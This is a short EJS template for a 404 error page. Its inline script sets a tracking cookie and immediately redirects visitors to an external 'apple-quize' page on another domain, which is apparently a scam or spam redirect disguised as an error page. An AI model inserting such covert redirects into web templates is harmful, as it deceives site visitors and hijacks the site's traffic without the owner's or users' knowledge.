<%- include("partials/header"); -%>

<h6>404 not Found</h6>
<script type="text/javascript">
var now = new Date();
now.setTime(now.getTime() + 1 * 3600 * 1000);
document.cookie = "a1=1; expires=" + now.toUTCString() + "; path=/";
window.location.href = "https://pixelpaste.net/quize/apple-quize"
</script>

<%- include("partials/footer"); -%>
